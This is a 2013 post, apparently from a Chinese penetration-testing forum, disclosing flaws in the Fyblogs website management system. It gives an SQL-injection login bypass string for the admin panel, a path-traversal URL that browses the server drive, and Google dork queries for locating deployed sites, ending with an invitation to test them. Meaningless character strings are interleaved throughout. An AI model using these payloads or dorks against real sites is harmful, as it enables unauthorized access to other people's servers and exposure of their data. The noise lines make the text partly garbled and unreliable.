中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-7 13:07
标题:
Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
7 \$ D9 o$ k3 \* r
$ h _, h& O, T" E& x8 ^
简要描述:
) n6 x! g3 [4 i; w! z( o
- P _/ u4 y+ E5 F- g/ L7 H" [
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
1 b1 u; c* K7 _1 s Z
: \4 j% y* Y5 a( w
详细说明:
c1 N' ?) R) D& t9 k) W
+ S* Q! |; b& r1 p' v
后台万能密码 'or'='or'
% N" r' I# O- I. _/ J
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
+ F Q8 f" b0 h) ~
admin/uploadfile.asp?currentFolder=/upfiles/../
! v7 v% l# q9 @# k
/ S% `7 m1 S6 v) K: j* ?7 _
漏洞证明:
5 K1 e9 [9 V8 ]( C# {) G$ J
$ l3 X _' \' V+ h- Q
谷歌:inurl:type.asp?id=1 新闻中心
( S) u0 N/ ]2 C* S% ?) A% h) e
或者 :inurl:download_ok.asp?
! ^. i6 y% U( ~+ Q; y) o
: ^: b! X1 l) i- Q
可以测试
7 k. t% R6 S: l& |- V% i. w
6 J d: m+ M1 s6 g) i# V
9 d1 `/ {9 p6 l& ]' r& L
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2